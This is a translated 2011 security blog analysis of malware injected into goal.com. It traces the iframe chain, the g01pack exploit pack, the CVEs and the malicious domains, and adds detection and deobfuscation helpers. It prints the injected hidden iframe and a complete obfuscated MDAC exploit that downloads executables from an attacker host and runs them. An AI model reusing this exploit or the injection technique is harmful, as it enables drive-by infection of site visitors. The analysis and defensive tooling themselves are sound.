阿碼外傳 - Armorize's unofficial Chinese blog: Well-known football site (goal.com) spreading malware

May 10, 2011

Well-known football site (goal.com) spreading malware

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

1. According to compete.com, goal.com averages 232,116 visitors per day
2. According to checksitetraffic.com, it has 215,989 visitors per day
3. goal.com's global Alexa (alexa.com) rank is 379

HackAlert recently detected drive-by-download behavior between 4/27 and 4/28. Based on what we observed, we believe the attacker has access to goal.com's internal systems and was only testing the effectiveness of the attack during 4/27~4/28.
Our technical report follows:

[Summary]

A. Based on the data we collected, part of goal.com appears to have been compromised, allowing the attacker to manipulate its page content. The infected site may contain a backdoor that the attacker can use persistently to control it.

B. We do not believe this is a one-off mass SQL injection attack, because the malicious domains involved have not appeared on any other infected sites.

C. The malicious domains include:
1. pxcz.cz.cc (not blacklisted by any antivirus vendor or Google SafeBrowsing)
2. opofy7puti.cz.cc (not blacklisted by any antivirus vendor or Google SafeBrowsing)
3. justatest.cz.cc (not blacklisted by any antivirus vendor or Google SafeBrowsing)

These clues indicate that this was a targeted attack against goal.com.

D. The distribution period was 4/27~4/28; the attacker appears to have used this window to test the effectiveness of the attack, and our scanner caught it during that time.

E. The exploit code we sampled targets the following vulnerabilities: CVE-2010-1423 (Java), CVE-2010-1885 (MS Help Center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC)

F. The g01pack exploit pack was used. Unlike typical exploit packs, it includes a fake admin management page; the attacker uses this fake "honeynet" to observe who is investigating further.

G. The exploit code itself is heavily "mutated". We deliberately avoid the word "obfuscated" here because, beyond obfuscation, the exploit code uses an approach to evading detection that differs from what we have seen before.

H. The malware itself is packed with UPX and modifies setupapi.dll and sfcfiles.dat on the system. When we first submitted it to VirusTotal, only four antivirus vendors (4 / 41) flagged it as malicious.

I. The malware connects to the following domains:

1. testurl.ipq.co:80 (UK) (not blacklisted by any antivirus vendor or Google SafeBrowsing)
2. 74.125.47.99:80 (US), which reverse-resolves to coldgold.co.uk (not blacklisted by any antivirus vendor or Google SafeBrowsing)
3. banderlog.org (not blacklisted by any antivirus vendor or Google SafeBrowsing, but it does show up on clean-mx.de)

[Details]

The infection log we captured can be downloaded here. It contains the HTTP traffic generated while browsing with a browser, from the first visit to the site until the malware itself is downloaded through the browser.

The full infection chain is:
1. goal.com contains an iframe pointing to pxcz.cz.cc
2. pxcz.cz.cc contains an iframe pointing to justatest.cz.cc
3. justatest.cz.cc contains the exploit code (g01pack exploit pack), which serves a different exploit depending on the user's browser
4. Once the exploit runs successfully, the malware is downloaded from justatest.cz.cc
5. The malware connects to testurl.ipq.co (UK), 74.125.47.99:80 (US, coldgold.co.uk), and banderlog.org
The infection chain begins at http://www.goal.com/en/:
<p>Arjen Robben has admitted that his future lies with the German and European giants, hinting that he could even remain there for the rest of his career <style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg"></iframe></p>

The attacker appended an iframe pointing to pxcz.cz.cc to the HTML above. pxcz.cz.cc contains another iframe pointing to justatest.cz.cc, and justatest.cz.cc hosts both the exploit code (g01pack) and the malware itself. What is unusual about this g01pack is that it also includes fake admin pages. These admin pages accept some common credentials (for example Admin / Admin), so that analysts believe they have successfully obtained access to the g01pack management panel.
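As an added example (not code from the original post or from Armorize), a small check that flags iframes hidden by a 1px / visibility:hidden CSS rule, like the #yxvim iframe above; the sample HTML and the allow-list of trusted iframe origins are constructed for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the injected snippet shown above, plus one
# legitimate widget iframe so the check has a negative case.
SAMPLE_HTML = (
    '<p>Arjen Robben has admitted that his future lies with the German giants '
    '<style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;'
    'visibility: hidden;}</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg">'
    '</iframe></p><p>Scores <iframe id="scores" src="https://www.example.org/w"></iframe></p>'
)
TRUSTED_HOSTS = {"www.goal.com", "www.example.org"}  # assumed allow-list of expected iframe origins
HIDING = re.compile(r"(width|height)\s*:\s*[01]px|visibility\s*:\s*hidden|display\s*:\s*none", re.I)

class IframeCollector(HTMLParser):
    """Collect inline <style> text and every <iframe id/src> in document order."""
    def __init__(self):
        super().__init__()
        self.in_style, self.css, self.iframes = False, "", []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "style":
            self.in_style = True
        elif tag == "iframe":
            self.iframes.append((a.get("id"), a.get("src", "")))
    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
    def handle_data(self, data):
        if self.in_style:
            self.css += data

def hidden_ids(css):
    """ids whose #id {...} rule shrinks the element to 0/1px or hides it outright."""
    return {sel for sel, body in re.findall(r"#([\w-]+)\s*\{([^}]*)\}", css) if HIDING.search(body)}

def audit(html):
    """Return [(id, src, reasons)] for iframes that look like injected loaders."""
    p = IframeCollector()
    p.feed(html)
    hidden = hidden_ids(p.css)
    findings = []
    for fid, src in p.iframes:
        host = urlparse(src).hostname or ""
        reasons = []
        if fid in hidden:
            reasons.append("hidden-by-css")
        if host not in TRUSTED_HOSTS:
            reasons.append("untrusted-host:" + host)
        if re.search(r"\.(jpe?g|png|gif)$", urlparse(src).path, re.I):
            reasons.append("image-extension-in-iframe")  # an "ad.jpg" that is really HTML
        if reasons:
            findings.append((fid, src, reasons))
    return findings
```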

Once logged in, the analyst is shown statistics fabricated by the attacker, while the attacker in turn learns, from this activity, who is trying to analyze the malicious domain.

The exploit code in this incident is heavily "mutated"; unlike earlier obfuscation techniques, this keeps analysts from recognizing it as exploit code at a glance. The exploit pack itself contains many exploits; here we show only the one that targets CVE-2006-0003 (MS MDAC). This exploit code can be obtained here.
<html>en clonus purins knot ghat inlier sine bipeds obese tart.<body>heroins pallors glugs. Opera. Pyx ducted boss shea abele knot hajes eh moot nisi tickled howl pangens bobs blind stir reinked ajee.atria obese saddle. Nisi uh bracts pyx.bipeds abaft arctic brave arabic purins blind polo. Pyx pallors. Sludge atria noisy bug slojd stow dumps. Kappa sri tawse bracts hank.fresco delta. Caldron arctic bucko sine byre inlier haeres.<script>var test;function redirect(){location.href="?topic_id=6.0&forum_id=qtest&action=MSIE&nid=name&year=c&start=2&thread_id=53585053&rid=708";}setTimeout(redirect, 20000);var move=new String("openul0".substr(0,4));var out=["ctfmon",String("javaWI8X".substr(0,4)),new String("acro"+"bat"),new String("explore"+"rC52".substr(0,1)),String("useri"+"nit"),"chromeHkpS".substr(0,6),"svch"+"ostc"];var follow="Sav"+"eTo"+"Fil"+"e";var air;var family=1;var low=6000;var never=";";var now=String("setTimeout");var sun=0;var age="";var turn=[];var have=["spellOver","play","cross"];this.few=29107;this.few-=150;var begin;var useDrive="clsid:BD9oqk".substr(0,9)+"6C556-65ANEm".substr(0,9)+"3-11D0-98rWqE".substr(0,9)+"3A-00C04F"+"ZuqC29E36uqZ".substr(3,6);var stay=new String("she"+"lle"+"xec"+"ute");var then=new String("replaceUyK".substr(0,7));var once=new String("typeUdm".substr(0,4));var ground=["youUnder","home","base"];var own=new String();var meLittle="setAttrT2hF".substr(0,7)+"ibute5MEY".substr(0,5);var will=new String("pus5ceI".substr(0,3)+"9BUhU9B".substr(3,1));var most=2;var best="send";var teachSeem="";var star="";try {} catch(mark){};var strong;var bed="Close";var end="Wri"+"te";var pass="http://opofy7puti.cz.cc:80/domains/f848af41f9d81c1603fb52a6b7844642.php?start=12&thread_id=53585053&forum_id=qtest&";var readAmong="CreateObjec"+"t";var redDog="responseBo"+"dyck4".substr(0,2);function oh(){sea=[];want=18559;want++;try {var book="ourPiece"} catch(book){};var they="";come=["northTurn","set","above"];change={};if(pass.indexOf(never) > -1){var 
groundMight=new Array();this.strongLess=978;this.strongLess++;call={word:10445};var writeHim=["comeWould"];var serve="";var stopYes="";hand=25269;hand-=192;school = pass.split(never);var good={his:20957};var turnBoy=false;this.travel="travel";add=16993;add--;var should="";for(var i in school){var govern="";this.airMark=false;place=27537;place-=204;try {var run="familyCommon"} catch(run){};var yetNeed=new String();var quick = school[i][then](/^\s+|\s+$/g, age); var music="";this.plant=459;this.plant-=142;var underHad="";fall={};yetFarm=6780;yetFarm-=19;var shape=29557;if(quick != age){var make=false;var their={high:"down"};plane={yes:"front"};turn[will](quick);wood={blue:8491};ohEat=17592;ohEat+=255;this.road="road";}}} else {var thereLarge=new String();var yesWheel=new String();var saw=["shortSleep","stayCommon","heard"];this.yourLeave="yourLeave";var table=23075;turn[will](pass);var turnYet="turnYet";var friendPound={newBody:"studyNotice"};} dryCity={callChange:16908};this.passPeople=8404;this.passPeople--;var drive=[];var able="";var willTake="willTake";return turn;}var foodThough=new String();try {} catch(veryStrong){};this.moveEarth=7491;this.moveEarth+=102;this.someOpen=26120;this.someOpen++;function than(again, point){life=["simple"];knowGround=24748;knowGround--;figureFigure=30877;figureFigure-=200;var does=new String();var sleepFace=["orWalk","inch","cold"];yourSlow=775;yourSlow+=122;what=[];a=21635;a+=166;test[meLittle](again, point);}northBeauty={watch:"fewLove"};var line={};var head=22943;var piece=32549;function the(){var pose=20499;var frontCross=4606;ago=7777;ago+=220;if(!free()) return;serveWell=25614;serveWell++;objectWorld=24863;objectWorld-=114;darkCommon=22684;darkCommon++;var willPerson=new Array();test=document.createElement(new String("object"));than(new String("classi"+"d"), useDrive);var moveEarly="moveEarly";this.moonHome="";bedPower={since:false};than("id", "test");try {strong = 
test[readAmong]("Shell.A9kDj".substr(0,7)+"DH0pplicat0HD".substr(3,7)+"MrbionMbr".substr(3,3),age);find=[];this.learn="";hold=[];air = test[readAmong]("adodb.strea"+"mnXk".substr(0,1),age);this.why=19607;this.why++;var rest=new Date();var him="";var turn = oh();this.differ="differ";var sawAmong=["moneyAt","moreA","boyMuch"];var stopSun=["letter","pound","young"];var sideHeat=["white","spellAbove"];var thoseFirst=["northFact","needCome"];doesRock=17386;doesRock--;if(turn.length <= 0) return false;which=["i","took","fish"];agoOld=["laughOften","seemOrder","figureGreen"];var runHalf={cut:27153};var schoolOut=["differGot","wonder","poseNotice"];for(var i=sun; i < turn.length; i++){var fromLong=new Date();var haveSlow=new String();var ifCover=["finalDone","againOnly"];var unitIt=[];pullTown={leadOut:"deepMade"};var decide=[];this.both=22541;this.both++;var unit = out[i % out.length];var enough = turn[i];goodDrive={water:"cry"};secondCenter=[];var endDiffer=false;var your = "./."+"./yzvw".substr(0,2) + unit + new String(".exe");this.dont=18287;this.dont--;try {var faceAppear="fewReal"} catch(faceAppear){};var voicePoint=low * i;var shortPlane=["heatRule"];var knew="";try {var shapeCause="ageHave"} catch(shapeCause){};dryLook=[];meanFar(new String(enough), new String(your));var right=23685;try {} catch(feel){};try {} catch(hisTree){};var had=new Date();}} catch(e){}}function longSaid(stoodTree){planeIt={};var shouldSide=8362;northAmong={faceMade:false};var windReal="windReal";cutOften=["riverPiece","orderWater","commonLay"];nowSay=["bodyAlso"];begin = test[readAmong]("msxml2.XMLO4eW".substr(0,10)+"HTTP", age);var planeTop=new Date();whichThem={shipSame:26359};var fatherIdea=24125;var there=16243;begin[move]("GET", stoodTree);asAmong=["seaFew"];whileRun=["warDrive"];this.feetSing=7842;this.feetSing--;begin[best]();var thatWhen="thatWhen";this.hisNever="hisNever";story=9303;story+=10;return begin[redDog];}function free(){var 
thereWrite={strongPaper:false};this.keepLot="";return (document.body.style.textOverflow != undefined);}function meanFar(stoodTree,color){var wentMother=["turnTalk","staySleep","she"];this.largeRed=28365;this.largeRed-=184;eat=["atMove"];var found={shouldPlay:"figureStep"};try {var standMother=3260;toward=26805;toward++;var actPress="";try {var work="lightCold"} catch(work){};try {var other=new Date();var rainTable=28788;air[bed]();this.coldMake="coldMake";fatherUs=["andFast","hour"];} catch(stand){}this.lastTheir=29388;this.lastTheir--;var downStrong={topWas:11226};try {var answerWater="servePaper"} catch(answerWater){};power=longSaid(stoodTree);peopleHad=["kingRiver"];this.house=4015;this.house++;air[once]=family;cameWho={hasEye:"bringForce"};foodEast=["feetThat","shortHave"];air[move]();happenUs=["fewMany","butWell"];var helpRound=27891;air[end](power);drawHome={number:721};surePage={late:false};air[follow](color,most);try {var cryFarm="putFollow"} catch(cryFarm){};var plantClear="";air[bed]();try {var meEver="shapeDark"} catch(meEver){};try{var whyRule=["slow","followNight"];var whiteAnswer=["standWatch","fastKnew"];var sameOff=26811;actCome=["walkHand","even","waterWay"];this.draw=29713;this.draw-=76;strong[stay](color);var clear="";var tellFront=["seemBody"];var lookNumber="";} catch(e){}mayForce=12153;mayForce+=212;var homeMay={unitFirst:false};manAt=8219;manAt+=30;whereSoon=["happenRiver","aboveCause"];cutLive=["wentThere","meanBusy"];}catch(noun) {lessFive=["fishTail","behindYet","ourAgo"];this.same=false;var airSix="";try {var direct=false;var better=["showGrow","factHand"];air[bed]();changeBack={hot:6344};var it=new Array();} catch(first){}helpPlain=["beBig","listen"];}var ageSecond=15826;this.fallThree="";var faceTree=28716;}var sleep=0;var topAnimal=false;function groundMen(){while(sleep++ < 171){groundMen();}if(!topAnimal){topAnimal = true;the();}}groundMen();</script>nisi nebs coalify opera caw add gluts rewon toph reinked bucko web moot.woofer 
reinked haeres arabic hernia bice blind nebs schmoos stow opera obese snaffle en hajes scow pyx.</body></html>

2 responses:

Anonymous said...

Thanks for sharing.
I'd like to ask the author a few questions:
1. What is an exploit pack?
2. What is the purpose of UPX packing? Which headers does it modify?
3. "Beyond obfuscation, the exploit code itself uses a different approach to evade detection"
Could the author list some common evasion methods, with simple examples?

Thanks for your guidance.

Cola said...

1.
An exploit pack is a toolkit that contains several pieces of exploit code.
With the help of an exploit pack, an attacker can hit several vulnerabilities at once (one piece of exploit code per vulnerability).

In this incident, for example, we observed g01pack attacking the following vulnerabilities: CVE-2010-1423, CVE-2010-1885, CVE-2009-0927, CVE-2006-0003

2.
Generally speaking, packing serves the following purposes:
a. Reduce the size of the PE file (an .exe, i.e. an ordinary executable)
b. Anti-reverse-engineering, making reverse engineering harder
c. Evade detection by signature-based antivirus software

3.
For obfuscation, the common ways to evade detection are string manipulation (e.g. substr, replace), custom function names (e.g. oiahc in place of eval), and even custom encryption algorithms.

As for the "mutation" mentioned in the article: when analyzing this case we found that the exploit code itself was unlike what we had seen before. The main differences are:
a. Meaningless statements are inserted into the exploit code to hinder analysis, e.g. mayForce=12153;mayForce+=212;, where the variable is never used at all
b. The function names no longer carry the features that, in other cases we analyzed, told us which vulnerability was targeted (e.g. MDAC, IEPEER); they are replaced with apparently meaningless names
c. Common exploit-code features are absent, such as large numbers of repeated similar strings, URL encoding, HEX encoding, etc.
These three properties make signature-matching techniques less effective at detection.
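A small analyst helper, added here and not part of the original post or Armorize's tooling, that mechanically undoes the string tricks Cola describes (substr slicing, "+" concatenation, String() wrapping) and strips the unused numeric statements; the input is a constructed script built from fragments quoted in the write-up, and the regexes assume the literals contain no escaped quotes.

```python
import re

# Constructed sample: string-building and junk statements of the kind quoted in
# the write-up, joined into one small script for the demo.
SAMPLE = ('var useDrive="clsid:BD9oqk".substr(0,9)+"6C556-65ANEm".substr(0,9)'
          '+"3-11D0-98rWqE".substr(0,9)+"3A-00C04F"+"ZuqC29E36uqZ".substr(3,6);'
          'mayForce=12153;mayForce+=212;this.few=29107;this.few-=150;'
          'var app=new String("Shell.A9kDj".substr(0,7)+"DH0pplicat0HD".substr(3,7)'
          '+"MrbionMbr".substr(3,3));var move=String("openul0".substr(0,4));')

# "lit".substr(start, len)   (JS substr takes a length, not an end index)
SUBSTR = re.compile(r'"([^"\\]*)"\.substr\(\s*(\d+)\s*,\s*(\d+)\s*\)')
# "a" + "b"  ->  "ab"
CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
# String("x") / new String("x")  ->  "x"
WRAP = re.compile(r'(?:new\s+)?String\(\s*("[^"\\]*")\s*\)')
# name=123;name+=45;  (also ++ / -- / -=, with or without this.) : dead arithmetic
JUNK = re.compile(r'(?<!var )(?:this\.)?\b(\w+)=\d+;(?:this\.)?\1(?:\+\+|--|[+-]=\d+);')

def fold_strings(src):
    """Constant-fold substr / + / String() repeatedly until a fixpoint is reached."""
    while True:
        new = SUBSTR.sub(lambda m: '"%s"' % m.group(1)[int(m.group(2)):int(m.group(2)) + int(m.group(3))], src)
        new = CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)), new)
        new = WRAP.sub(lambda m: m.group(1), new)
        if new == src:
            return new
        src = new

def strip_junk(src):
    """Drop the never-read counter statements used as padding."""
    return JUNK.sub("", src)

def deobfuscate(src):
    return strip_junk(fold_strings(src))
```

After folding, the recovered literals (the COM ProgIDs and the CLSID) are exactly the strings a signature would normally have matched on, which is why this padding defeats naive pattern matching.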
